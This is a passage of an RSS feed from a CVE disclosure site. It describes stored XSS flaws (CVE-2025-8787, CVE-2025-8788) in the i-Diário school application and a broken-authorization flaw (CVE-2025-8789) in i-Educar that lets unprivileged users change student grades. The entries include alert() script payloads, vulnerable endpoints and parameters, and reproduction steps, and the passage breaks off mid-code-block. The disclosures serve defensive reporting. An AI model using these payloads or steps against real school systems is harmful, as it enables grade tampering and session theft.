    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 10 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8787</title>
        <link>https://www.cvehunters.com/p/cve-2025-8787/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8787/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8787-multiples-cross-site-scripting-xss-stored-in-endpoint-registros-de-conteudos-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-8787: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-disciplina/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8787&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8787&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/registros-de-conteudos-por-disciplina/[ID]&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8787-multiples-cross-site-scripting-xss-stored-in-endpoint-registros-de-conteudos-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-8787: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-disciplina/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8787&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8787&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/registros-de-conteudos-por-disciplina/[ID]&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/registros-de-conteudos-por-disciplina/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8787/image.png&amp;#34;
	width=&amp;#34;1478&amp;#34;
	height=&amp;#34;1024&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8787/image_hu_af95e2fb9a2d3cce.png 480w, /p/cve-2025-8787/image_hu_71862e9971386bbb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;144&amp;#34;
		data-flex-basis=&amp;#34;346px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8787.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8787.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 10 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8788</title>
        <link>https://www.cvehunters.com/p/cve-2025-8788/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8788/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8788-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-aula-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-8788: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/planos-de-aula-por-areas-de-conhecimento.(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8788&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8788&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/planos-de-aula-por-areas-de-conhecimento.(ID)&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8788-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-aula-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-8788: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/planos-de-aula-por-areas-de-conhecimento.(ID)&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8788&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8788&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/planos-de-aula-por-areas-de-conhecimento.(ID)&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/planos-de-aula-por-areas-de-conhecimento.(ID)&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Parecer&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivos&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8788/image.png&amp;#34;
	width=&amp;#34;1038&amp;#34;
	height=&amp;#34;848&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8788/image_hu_9b8b7d2a254f8182.png 480w, /p/cve-2025-8788/image_hu_650bf2e02f0977a4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;122&amp;#34;
		data-flex-basis=&amp;#34;293px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8788.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8788.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 10 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8789</title>
        <link>https://www.cvehunters.com/p/cve-2025-8789/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8789/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8789-broken-function-level-authorization-bfla-allows-unauthorized-users-to-alter-student-grades&amp;#34;&amp;gt;CVE-2025-8789: Broken Function Level Authorization (BFLA) allows unauthorized users to alter student grades
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8789&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8789&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An API endpoint in i-Educar 2.9.0 is vulnerable to Broken Function Level Authorization (BFLA). An unauthorized user is able to modify student grades by directly accessing the &amp;lt;code&amp;gt;/module/Api/Diario&amp;lt;/code&amp;gt; endpoint, bypassing permission controls. This leads to severe integrity issues, where anyone with access to the API format can tamper with academic records.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8789-broken-function-level-authorization-bfla-allows-unauthorized-users-to-alter-student-grades&amp;#34;&amp;gt;CVE-2025-8789: Broken Function Level Authorization (BFLA) allows unauthorized users to alter student grades
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8789&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8789&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An API endpoint in i-Educar 2.9.0 is vulnerable to Broken Function Level Authorization (BFLA). An unauthorized user is able to modify student grades by directly accessing the &amp;lt;code&amp;gt;/module/Api/Diario&amp;lt;/code&amp;gt; endpoint, bypassing permission controls. This leads to severe integrity issues, where anyone with access to the API format can tamper with academic records.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The endpoint &amp;lt;code&amp;gt;/module/Api/Diario&amp;lt;/code&amp;gt; does not enforce proper authorization checks to validate whether the calling user has the right to alter student grades. Even a user without any profile or assigned permissions can successfully submit a request and change the grades of students in the system.&amp;lt;/br&amp;gt;There is no validation of session roles or associated permissions before executing sensitive academic actions.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;1 - Create a new user with no privileges:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8789/image.png&amp;#34;
	width=&amp;#34;1265&amp;#34;
	height=&amp;#34;845&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8789/image_hu_12fb6a5884d4c7fe.png 480w, /p/cve-2025-8789/image_hu_1cd7def43b89cd3b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;149&amp;#34;
		data-flex-basis=&amp;#34;359px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;2 - Prepare a request to the &amp;lt;code&amp;gt;/module/Api/Diario&amp;lt;/code&amp;gt; endpoint with the data to submit a student grade, using the low privillege user cookie then send the request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8789/image-1.png&amp;#34;
	width=&amp;#34;1907&amp;#34;
	height=&amp;#34;706&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8789/image-1_hu_4233548f4a00bb09.png 480w, /p/cve-2025-8789/image-1_hu_e6aa64e535ea83af.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;270&amp;#34;
		data-flex-basis=&amp;#34;648px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Translated result from pt-br to en:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
